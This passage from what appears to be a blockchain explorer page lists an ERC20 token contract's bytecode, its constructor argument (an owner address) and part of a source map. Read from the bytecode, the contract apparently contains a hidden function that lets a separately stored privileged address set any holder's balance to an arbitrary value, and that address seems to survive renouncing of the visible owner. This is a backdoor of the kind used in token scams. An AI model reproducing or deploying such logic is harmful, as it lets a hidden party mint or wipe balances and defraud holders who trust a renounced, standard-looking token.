81810360008301526117b281611776565b9050919050565b7f4945524332303a207472616e736665722066726f6d20746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b600061181560268361115e565b9150611820826117b9565b604082019050919050565b6000602082019050818103600083015261184481611808565b9050919050565b7f4945524332303a207472616e7366657220746f20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006118a760248361115e565b91506118b28261184b565b604082019050919050565b600060208201905081810360008301526118d68161189a565b9050919050565b60006118e882611268565b91506118f383611268565b925082820390508181111561190b5761190a611592565b5b92915050565b600061191c82611268565b915061192783611268565b925082820190508082111561193f5761193e611592565b5b92915050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b600061197b601b8361115e565b915061198682611945565b602082019050919050565b600060208201905081810360008301526119aa8161196e565b905091905056fe4945524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726f4945524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e63654945524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a2646970667358221220ad5a04184d00acac81f1d8958e51cf89f8a54594cd4502e0150f11406cf6761964736f6c63430008120033000000000000000000000000a3f236ce1f5c5d13ae466543f6209171ec9e6c98

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101005760003560e01c8063893d20e811610097578063a457c2d711610066578063a457c2d71461029f578063a9059cbb146102cf578063dd62ed3e146102ff578063f2fde38b1461032f57610100565b8063893d20e8146102295780638c287cb9146102475780638da5cb5b1461026357806395d89b411461028157610100565b8063313ce567116100d3578063313ce567146101a157806339509351146101bf57806370a08231146101ef578063715018a61461021f57610100565b806306fdde0314610105578063095ea7b31461012357806318160ddd1461015357806323b872dd14610171575b600080fd5b61010d61034b565b60405161011a91906111e3565b60405180910390f35b61013d6004803603810190610138919061129e565b6103dd565b60405161014a91906112f9565b60405180910390f35b61015b6103fb565b6040516101689190611323565b60405180910390f35b61018b6004803603810190610186919061133e565b610405565b60405161019891906112f9565b60405180910390f35b6101a96104de565b6040516101b691906113ad565b60405180910390f35b6101d960048036038101906101d4919061129e565b6104f5565b6040516101e691906112f9565b60405180910390f35b610209600480360381019061020491906113c8565b6105a8565b6040516102169190611323565b60405180910390f35b6102276105f1565b005b61023161072b565b60405161023e9190611404565b60405180910390f35b610261600480360381019061025c919061141f565b61073a565b005b61026b61085f565b6040516102789190611404565b60405180910390f35b610289610888565b60405161029691906111e3565b60405180910390f35b6102b960048036038101906102b4919061129e565b61091a565b6040516102c691906112f9565b60405180910390f35b6102e960048036038101906102e4919061129e565b6109e7565b6040516102f691906112f9565b60405180910390f35b61031960048036038101906103149190611486565b610a05565b6040516103269190611323565b60405180910390f35b610349600480360381019061034491906113c8565b610a8c565b005b60606007805461035a906114f5565b80601f0160208091040260200160405190810160405280929190818152602001828054610386906114f5565b80156103d35780601f106103a8576101008083540402835291602001916103d3565b820191906000526020600020905b8154815290600101906020018083116103b657829003601f168201915b5050505050905090565b60006103f16103ea610c34565b8484610c3c565b6001905092915050565b6000600454905090565b6000610412848484610e05565b6104d38461041e610c34565b6104ce856040518060600160405280602981526020016119ff60299139600260008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000610484610c34565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546110919092919063ffffffff16565b610c3c565b600190509392505050565b6000600560009054906101000a900460ff16905090565b600061059e610502610c34565b846105998560026000610513610c34565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546110f590919063ffffffff16565b610c3c565b6001905092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6105f9610c34565b73ffffffffffffffffffffffffffffffffffffffff1661061761085f565b73ffffffffffffffffffffffffffffffffffffffff161461066d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161066490611572565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a360008060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b600061073561085f565b905090565b610742610c34565b73ffffffffffffffffffffffffffffffffffffffff16600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146107d1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107c890611572565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff160361080a57600080fd5b808261081691906115c1565b600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555050505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060068054610897906114f5565b80601f01602080910402602001604051908101604052809291908181526020018280546108c3906114f5565b80156109105780601f106108e557610100808354040283529160200191610910565b820191906000526020600020905b8154815290600101906020018083116108f357829003601f168201915b5050505050905090565b60006109dd610927610c34565b846109d8856040518060600160405280602681526020016119b26026913960026000610951610c34565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546110919092919063ffffffff16565b610c3c565b6001905092915050565b60006109fb6109f4610c34565b8484610e05565b6001905092915050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610a94610c34565b73ffffffffffffffffffffffffffffffffffffffff16610ab261085f565b73ffffffffffffffffffffffffffffffffffffffff1614610b08576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610aff90611572565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610b77576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b6e90611675565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610cab576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ca290611707565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610d1a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d1190611799565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610df89190611323565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610e74576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e6b9061182b565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610ee3576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610eda906118bd565b60405180910390fd5b610f4f816040518060600160405280602781526020016119d860279139600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546110919092919063ffffffff16565b600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550610fe481600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546110f590919063ffffffff16565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516110849190611323565b60405180910390a3505050565b60008383111582906110d9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110d091906111e3565b60405180910390fd5b50600083856110e891906118dd565b9050809150509392505050565b60008082846111049190611911565b905083811015611149576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161114090611991565b60405180910390fd5b8091505092915050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561118d578082015181840152602081019050611172565b60008484015250505050565b6000601f19601f8301169050919050565b60006111b582611153565b6111bf818561115e565b93506111cf81856020860161116f565b6111d881611199565b840191505092915050565b600060208201905081810360008301526111fd81846111aa565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006112358261120a565b9050919050565b6112458161122a565b811461125057600080fd5b50565b6000813590506112628161123c565b92915050565b6000819050919050565b61127b81611268565b811461128657600080fd5b50565b60008135905061129881611272565b92915050565b600080604083850312156112b5576112b4611205565b5b60006112c385828601611253565b92505060206112d485828601611289565b9150509250929050565b60008115159050919050565b6112f3816112de565b82525050565b600060208201905061130e60008301846112ea565b92915050565b61131d81611268565b82525050565b60006020820190506113386000830184611314565b92915050565b60008060006060848603121561135757611356611205565b5b600061136586828701611253565b935050602061137686828701611253565b925050604061138786828701611289565b9150509250925092565b600060ff82169050919050565b6113a781611391565b82525050565b60006020820190506113c2600083018461139e565b92915050565b6000602082840312156113de576113dd611205565b5b60006113ec84828501611253565b91505092915050565b6113fe8161122a565b82525050565b600060208201905061141960008301846113f5565b92915050565b6000806000806080858703121561143957611438611205565b5b600061144787828801611253565b945050602061145887828801611253565b935050604061146987828801611289565b925050606061147a87828801611289565b91505092959194509250565b6000806040838503121561149d5761149c611205565b5b60006114ab85828601611253565b92505060206114bc85828601611253565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061150d57607f821691505b6020821081036115205761151f6114c6565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b600061155c60208361115e565b915061156782611526565b602082019050919050565b6000602082019050818103600083015261158b8161154f565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006115cc82611268565b91506115d783611268565b92508282026115e581611268565b915082820484148315176115fc576115fb611592565b5b5092915050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b600061165f60268361115e565b915061166a82611603565b604082019050919050565b6000602082019050818103600083015261168e81611652565b9050919050565b7f4945524332303a20617070726f76652066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006116f160258361115e565b91506116fc82611695565b604082019050919050565b60006020820190508181036000830152611720816116e4565b9050919050565b7f4945524332303a20617070726f766520746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b600061178360238361115e565b915061178e82611727565b604082019050919050565b600060208201905081810360008301526117b281611776565b9050919050565b7f4945524332303a207472616e736665722066726f6d20746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b600061181560268361115e565b9150611820826117b9565b604082019050919050565b6000602082019050818103600083015261184481611808565b9050919050565b7f4945524332303a207472616e7366657220746f20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006118a760248361115e565b91506118b28261184b565b604082019050919050565b600060208201905081810360008301526118d68161189a565b9050919050565b60006118e882611268565b91506118f383611268565b925082820390508181111561190b5761190a611592565b5b92915050565b600061191c82611268565b915061192783611268565b925082820190508082111561193f5761193e611592565b5b92915050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b600061197b601b8361115e565b915061198682611945565b602082019050919050565b600060208201905081810360008301526119aa8161196e565b905091905056fe4945524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726f4945524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e63654945524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a2646970667358221220ad5a04184d00acac81f1d8958e51cf89f8a54594cd4502e0150f11406cf6761964736f6c63430008120033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000a3f236ce1f5c5d13ae466543f6209171ec9e6c98

-----Decoded View---------------
Arg [0] : ownerOf_ (address): 0xa3F236CE1F5C5d13ae466543f6209171eC9e6C98

-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 000000000000000000000000a3f236ce1f5c5d13ae466543f6209171ec9e6c98


Deployed Bytecode Sourcemap

11350:4123:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;12340:94;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13143:163;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12570:102;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13314:316;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12124:94;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13642:212;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12680:121;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5783:150;;;:::i;:::-;;12018:94;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14996:474;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;5128:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12230:98;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13866:264;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12813:169;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12990:145;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6088:246;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;12340:94;12388:13;12421:5;12414:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;12340:94;:::o;13143:163::-;13220:4;13237:39;13246:12;:10;:12::i;:::-;13260:7;13269:6;13237:8;:39::i;:::-;13294:4;13287:11;;13143:163;;;;:::o;12570:102::-;12625:7;12652:12;;12645:19;;12570:102;:::o;13314:316::-;13414:4;13431:36;13441:6;13449:9;13460:6;13431:9;:36::i;:::-;13478:122;13487:6;13495:12;:10;:12::i;:::-;13509:90;13547:6;13509:90;;;;;;;;;;;;;;;;;:11;:19;13521:6;13509:19;;;;;;;;;;;;;;;:33;13529:12;:10;:12::i;:::-;13509:33;;;;;;;;;;;;;;;;:37;;:90;;;;;:::i;:::-;13478:8;:122::i;:::-;13618:4;13611:11;;13314:316;;;;;:::o;12124:94::-;12176:5;12201:9;;;;;;;;;;;12194:16;;12124:94;:::o;13642:212::-;13724:4;13741:83;13750:12;:10;:12::i;:::-;13764:7;13773:50;13812:10;13773:11;:25;13785:12;:10;:12::i;:::-;13773:25;;;;;;;;;;;;;;;:34;13799:7;13773:34;;;;;;;;;;;;;;;;:38;;:50;;;;:::i;:::-;13741:8;:83::i;:::-;13842:4;13835:11;;13642:212;;;;:::o;12680:121::-;12748:7;12775:9;:18;12785:7;12775:18;;;;;;;;;;;;;;;;12768:25;;12680:121;;;:::o;5783:150::-;5361:12;:10;:12::i;:::-;5350:23;;:7;:5;:7::i;:::-;:23;;;5342:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;5892:1:::1;5855:40;;5876:6;::::0;::::1;;;;;;;;5855:40;;;;;;;;;;;;5923:1;5906:6:::0;::::1;:19;;;;;;;;;;;;;;;;;;5783:150::o:0;12018:94::-;12070:7;12097;:5;:7::i;:::-;12090:14;;12018:94;:::o;14996:474::-;12493:12;:10;:12::i;:::-;12482:23;;:7;;;;;;;;;;;:23;;;12474:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;15197:1:::1;15172:27;;:13;:27;;::::0;15164:36:::1;;;::::0;::::1;;15285:9;15271:11;:23;;;;:::i;:::-;15243:9;:25;15254:13;15243:25;;;;;;;;;;;;;;;:51;;;;14996:474:::0;;;;:::o;5128:87::-;5174:7;5201:6;;;;;;;;;;;5194:13;;5128:87;:::o;12230:98::-;12280:13;12313:7;12306:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;12230:98;:::o;13866:264::-;13953:4;13970:130;13979:12;:10;:12::i;:::-;13993:7;14002:97;14041:15;14002:97;;;;;;;;;;;;;;;;;:11;:25;14014:12;:10;:12::i;:::-;14002:25;;;;;;;;;;;;;;;:34;14028:7;14002:34;;;;;;;;;;;;;;;;:38;;:97;;;;;:::i;:::-;13970:8;:130::i;:::-;14118:4;14111:11;;13866:264;;;;:::o;12813:169::-;12893:4;12910:42;12920:12;:10;:12::i;:::-;12934:9;12945:6;12910:9;:42::i;:::-;12970:4;12963:11;;12813:169;;;;:::o;12990:145::-;13073:7;13100:11;:18;13112:5;13100:18;;;;;;;;;;;;;;;:27;13119:7;13100:27;;;;;;;;;;;;;;;;13093:34;;12990:145;;;;:::o;6088:246::-;5361:12;:10;:12::i;:::-;5350:23;;:7;:5;:7::i;:::-;:23;;;5342:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;6199:1:::1;6179:22;;:8;:22;;::::0;6171:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;6289:8;6260:38;;6281:6;::::0;::::1;;;;;;;;6260:38;;;;;;;;;;;;6318:8;6309:6;::::0;:17:::1;;;;;;;;;;;;;;;;;;6088:246:::0;:::o;3715:98::-;3768:7;3795:10;3788:17;;3715:98;:::o;14640:348::-;14751:1;14734:19;;:5;:19;;;14726:69;;;;;;;;;;;;:::i;:::-;;;;;;;;;14833:1;14814:21;;:7;:21;;;14806:69;;;;;;;;;;;;:::i;:::-;;;;;;;;;14926:6;14896:11;:18;14908:5;14896:18;;;;;;;;;;;;;;;:27;14915:7;14896:27;;;;;;;;;;;;;;;:36;;;;14964:7;14948:32;;14957:5;14948:32;;;14973:6;14948:32;;;;;;:::i;:::-;;;;;;;;14640:348;;;:::o;14142:490::-;14258:1;14240:20;;:6;:20;;;14232:71;;;;;;;;;;;;:::i;:::-;;;;;;;;;14343:1;14322:23;;:9;:23;;;14314:72;;;;;;;;;;;;:::i;:::-;;;;;;;;;14435;14457:6;14435:72;;;;;;;;;;;;;;;;;:9;:17;14445:6;14435:17;;;;;;;;;;;;;;;;:21;;:72;;;;;:::i;:::-;14415:9;:17;14425:6;14415:17;;;;;;;;;;;;;;;:92;;;;14541:32;14566:6;14541:9;:20;14551:9;14541:20;;;;;;;;;;;;;;;;:24;;:32;;;;:::i;:::-;14518:9;:20;14528:9;14518:20;;;;;;;;;;;;;;;:55;;;;14606:9;14589:35;;14598:6;14589:35;;;14617:6;14589:35;;;;;;:::i;:::-;;;;;;;;14142:490;;;:::o;7980:178::-;8066:7;8095:1;8090;:6;;8098:12;8082:29;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;8118:9;8134:1;8130;:5;;;;:::i;:::-;8118:17;;8151:1;8144:8;;;7980:178;;;;;:::o;7153:167::-;7211:7;7227:9;7243:1;7239;:5;;;;:::i;:::-;7227:17;;7264:1;7259;:6;;7251:46;;;;;;;;;;;;:::i;:::-;;;;;;;;;7313:1;7306:8;;;7153:167;;;;:::o;7:99:1:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:246::-;368:1;378:113;392:6;389:1;386:13;378:113;;;477:1;472:3;468:11;462:18;458:1;453:3;449:11;442:39;414:2;411:1;407:10;402:15;;378:113;;;525:1;516:6;511:3;507:16;500:27;349:184;287:246;;;:::o;539:102::-;580:6;631:2;627:7;622:2;615:5;611:14;607:28;597:38;;539:102;;;:::o;647:377::-;735:3;763:39;796:5;763:39;:::i;:::-;818:71;882:6;877:3;818:71;:::i;:::-;811:78;;898:65;956:6;951:3;944:4;937:5;933:16;898:65;:::i;:::-;988:29;1010:6;988:29;:::i;:::-;983:3;979:39;972:46;;739:285;647:377;;;;:::o;1030:313::-;1143:4;1181:2;1170:9;1166:18;1158:26;;1230:9;1224:4;1220:20;1216:1;1205:9;1201:17;1194:47;1258:78;1331:4;1322:6;1258:78;:::i;:::-;1250:86;;1030:313;;;;:::o;1430:117::-;1539:1;1536;1529:12;1676:126;1713:7;1753:42;1746:5;1742:54;1731:65;;1676:126;;;:::o;1808:96::-;1845:7;1874:24;1892:5;1874:24;:::i;:::-;1863:35;;1808:96;;;:::o;1910:122::-;1983:24;2001:5;1983:24;:::i;:::-;1976:5;1973:35;1963:63;;2022:1;2019;2012:12;1963:63;1910:122;:::o;2038:139::-;2084:5;2122:6;2109:20;2100:29;;2138:33;2165:5;2138:33;:::i;:::-;2038:139;;;;:::o;2183:77::-;2220:7;2249:5;2238:16;;2183:77;;;:::o;2266:122::-;2339:24;2357:5;2339:24;:::i;:::-;2332:5;2329:35;2319:63;;2378:1;2375;2368:12;2319:63;2266:122;:::o;2394:139::-;2440:5;2478:6;2465:20;2456:29;;2494:33;2521:5;2494:33;:::i;:::-;2394:139;;;;:::o;2539:474::-;2607:6;2615;2664:2;2652:9;2643:7;2639:23;2635:32;2632:119;;;2670:79;;:::i;:::-;2632:119;2790:1;2815:53;2860:7;2851:6;2840:9;2836:22;2815:53;:::i;:::-;2805:63;;2761:117;2917:2;2943:53;2988:7;2979:6;2968:9;2964:22;2943:53;:::i;:::-;2933:63;;2888:118;2539:474;;;;;:::o;3019:90::-;3053:7;3096:5;3089:13;3082:21;3071:32;;3019:90;;;:::o;3115:109::-;3196:21;3211:5;3196:21;:::i;:::-;3191:3;3184:34;3115:109;;:::o;3230:210::-;3317:4;3355:2;3344:9;3340:18;3332:26;;3368:65;3430:1;3419:9;3415:17;3406:6;3368:65;:::i;:::-;3230:210;;;;:::o;3446:118::-;3533:24;3551:5;3533:24;:::i;:::-;3528:3;3521:37;3446:118;;:::o;3570:222::-;3663:4;3701:2;3690:9;3686:18;3678:26;;3714:71;3782:1;3771:9;3767:17;3758:6;3714:71;:::i;:::-;3570:222;;;;:::o;3798:619::-;3875:6;3883;3891;3940:2;3928:9;3919:7;3915:23;3911:32;3908:119;;;3946:79;;:::i;:::-;3908:119;4066:1;4091:53;4136:7;4127:6;4116:9;4112:22;4091:53;:::i;:::-;4081:63;;4037:117;4193:2;4219:53;4264:7;4255:6;4244:9;4240:22;4219:53;:::i;:::-;4209:63;;4164:118;4321:2;4347:53;4392:7;4383:6;4372:9;4368:22;4347:53;:::i;:::-;4337:63;;4292:118;3798:619;;;;;:::o;4423:86::-;4458:7;4498:4;4491:5;4487:16;4476:27;;4423:86;;;:::o;4515:112::-;4598:22;4614:5;4598:22;:::i;:::-;4593:3;4586:35;4515:112;;:::o;4633:214::-;4722:4;4760:2;4749:9;4745:18;4737:26;;4773:67;4837:1;4826:9;4822:17;4813:6;4773:67;:::i;:::-;4633:214;;;;:::o;4853:329::-;4912:6;4961:2;4949:9;4940:7;4936:23;4932:32;4929:119;;;4967:79;;:::i;:::-;4929:119;5087:1;5112:53;5157:7;5148:6;5137:9;5133:22;5112:53;:::i;:::-;5102:63;;5058:117;4853:329;;;;:::o;5188:118::-;5275:24;5293:5;5275:24;:::i;:::-;5270:3;5263:37;5188:118;;:::o;5312:222::-;5405:4;5443:2;5432:9;5428:18;5420:26;;5456:71;5524:1;5513:9;5509:17;5500:6;5456:71;:::i;:::-;5312:222;;;;:::o;5540:765::-;5626:6;5634;5642;5650;5699:3;5687:9;5678:7;5674:23;5670:33;5667:120;;;5706:79;;:::i;:::-;5667:120;5826:1;5851:53;5896:7;5887:6;5876:9;5872:22;5851:53;:::i;:::-;5841:63;;5797:117;5953:2;5979:53;6024:7;6015:6;6004:9;6000:22;5979:53;:::i;:::-;5969:63;;5924:118;6081:2;6107:53;6152:7;6143:6;6132:9;6128:22;6107:53;:::i;:::-;6097:63;;6052:118;6209:2;6235:53;6280:7;6271:6;6260:9;6256:22;6235:53;:::i;:::-;6225:63;;6180:118;5540:765;;;;;;;:::o;6311:474::-;6379:6;6387;6436:2;6424:9;6415:7;6411:23;6407:32;6404:119;;;6442:79;;:::i;:::-;6404:119;6562:1;6587:53;6632:7;6623:6;6612:9;6608:22;6587:53;:::i;:::-;6577:63;;6533:117;6689:2;6715:53;6760:7;6751:6;6740:9;6736:22;6715:53;:::i;:::-;6705:63;;6660:118;6311:474;;;;;:::o;6791:180::-;6839:77;6836:1;6829:88;6936:4;6933:1;6926:15;6960:4;6957:1;6950:15;6977:320;7021:6;7058:1;7052:4;7048:12;7038:22;;7105:1;7099:4;7095:12;7126:18;7116:81;;7182:4;7174:6;7170:17;7160:27;;7116:81;7244:2;7236:6;7233:14;7213:18;7210:38;7207:84;;7263:18;;:::i;:::-;7207:84;7028:269;6977:320;;;:::o;7303:182::-;7443:34;7439:1;7431:6;7427:14;7420:58;7303:182;:::o;7491:366::-;7633:3;7654:67;7718:2;7713:3;7654:67;:::i;:::-;7647:74;;7730:93;7819:3;7730:93;:::i;:::-;7848:2;7843:3;7839:12;7832:19;;7491:366;;;:::o;7863:419::-;8029:4;8067:2;8056:9;8052:18;8044:26;;8116:9;8110:4;8106:20;8102:1;8091:9;8087:17;8080:47;8144:131;8270:4;8144:131;:::i;:::-;8136:139;;7863:419;;;:::o;8288:180::-;8336:77;8333:1;8326:88;8433:4;8430:1;8423:15;8457:4;8454:1;8447:15;8474:410;8514:7;8537:20;8555:1;8537:20;:::i;:::-;8532:25;;8571:20;8589:1;8571:20;:::i;:::-;8566:25;;8626:1;8623;8619:9;8648:30;8666:11;8648:30;:::i;:::-;8637:41;;8827:1;8818:7;8814:15;8811:1;8808:22;8788:1;8781:9;8761:83;8738:139;;8857:18;;:::i;:::-;8738:139;8522:362;8474:410;;;;:::o;8890:225::-;9030:34;9026:1;9018:6;9014:14;9007:58;9099:8;9094:2;9086:6;9082:15;9075:33;8890:225;:::o;9121:366::-;9263:3;9284:67;9348:2;9343:3;9284:67;:::i;:::-;9277:74;;9360:93;9449:3;9360:93;:::i;:::-;9478:2;9473:3;9469:12;9462:19;;9121:366;;;:::o;9493:419::-;9659:4;9697:2;9686:9;9682:18;9674:26;;9746:9;9740:4;9736:20;9732:1;9721:9;9717:17;9710:47;9774:131;9900:4;9774:131;:::i;:::-;9766:139;;9493:419;;;:::o;9918:224::-;10058:34;10054:1;10046:6;10042:14;10035:58;10127:7;10122:2;10114:6;10110:15;10103:32;9918:224;:::o;10148:366::-;10290:3;10311:67;10375:2;10370:3;10311:67;:::i;:::-;10304:74;;10387:93;10476:3;10387:93;:::i;:::-;10505:2;10500:3;10496:12;10489:19;;10148:366;;;:::o;10520:419::-;10686:4;10724:2;10713:9;10709:18;10701:26;;10773:9;10767:4;10763:20;10759:1;10748:9;10744:17;10737:47;10801:131;10927:4;10801:131;:::i;:::-;10793:139;;10520:419;;;:::o;10945:222::-;11085:34;11081:1;11073:6;11069:14;11062:58;11154:5;11149:2;11141:6;11137:15;11130:30;10945:222;:::o;11173:366::-;11315:3;11336:67;11400:2;11395:3;11336:67;:::i;:::-;11329:74;;11412:93;11501:3;11412:93;:::i;:::-;11530:2;11525:3;11521:12;11514:19;;11173:366;;;:::o;11545:419::-;11711:4;11749:2;11738:9;11734:18;11726:26;;11798:9;11792:4;11788:20;11784:1;11773:9;11769:17;11762:47;11826:131;11952:4;11826:131;:::i;:::-;11818:139;;11545:419;;;:::o;11970:225::-;12110:34;12106:1;12098:6;12094:14;12087:58;12179:8;12174:2;12166:6;12162:15;12155:33;11970:225;:::o;12201:366::-;12343:3;12364:67;12428:2;12423:3;12364:67;:::i;:::-;12357:74;;12440:93;12529:3;12440:93;:::i;:::-;12558:2;12553:3;12549:12;12542:19;;12201:366;;;:::o;12573:419::-;12739:4;12777:2;12766:9;12762:18;12754:26;;12826:9;12820:4;12816:20;12812:1;12801:9;12797:17;12790:47;12854:131;12980:4;12854:131;:::i;:::-;12846:139;;12573:419;;;:::o;12998:223::-;13138:34;13134:1;13126:6;13122:14;13115:58;13207:6;13202:2;13194:6;13190:15;13183:31;12998:223;:::o;13227:366::-;13369:3;13390:67;13454:2;13449:3;13390:67;:::i;:::-;13383:74;